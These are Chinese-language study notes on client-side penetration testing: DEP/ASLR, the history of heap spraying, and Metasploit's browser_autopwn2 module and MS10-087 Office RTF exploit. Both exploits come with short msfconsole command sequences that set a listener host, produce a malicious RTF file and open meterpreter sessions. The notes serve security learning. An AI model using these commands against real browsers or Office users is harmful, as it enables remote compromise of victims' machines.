客户端概念
跟服务渗透类似又有区别
客户端是指,IE,Adobe.Office等应用软件为攻击目标。
安全防护机制
DEP数据执行保护
ASLR地址空间布局随机化
浏览器渗透
Metasploit内含100多个攻击模块
堆喷射利用
堆喷射是一种极具历史感的技术,第一次出现是在2001年。堆喷射最初的使用目的仅仅是为了给一些漏洞利用提供一个稳定的可以存放shellcode的地址,诸如在栈溢出利用中使用堆喷射放置shellcode然后劫持返回地址进行跳转(无dep情况)。堆喷射第一次在IE浏览器上的应用出现于CVE-2004-1050的exploit中,采用的是极其经典的nops+shellcode的方式。此后结合千疮百孔的ActiveX,诸如栈溢出,漏洞利用的成本着实相当之低。
browser_autopwn2
MSF自动识别浏览器版本并根据来实行不同的浏览器框架漏洞检测
msconsole search browser_autopwn use xxx/browser_autopwn2 set uripach <连接> set srvhost <shell监听地址> run sessions -i //查看成功之后创建的session列表 sessions -i 1 //连接session进入meterpreter
应用软件渗透
这个需要MSF生成指定的异形文件。针对某款软件
MS10-087 Office rtf解析漏洞
msconsole search ms10_087 use xxxxx/ms10_087_rtf_pfragments_bof set payload <攻击载荷> set filename ms10087.rtf exploit
总结
这一章节看的非常吃力,而且限制于环境。
对于漏洞环境架设很费时间,没有去操作了。
毕竟书中的实例都有些年头了。实用性感觉不太多,但是分析讲的很详细。
也还因为溢出漏洞需要扎实的反汇编基础。
总之需要深入了解引发漏洞的原理,多动手操作OD跟IDA。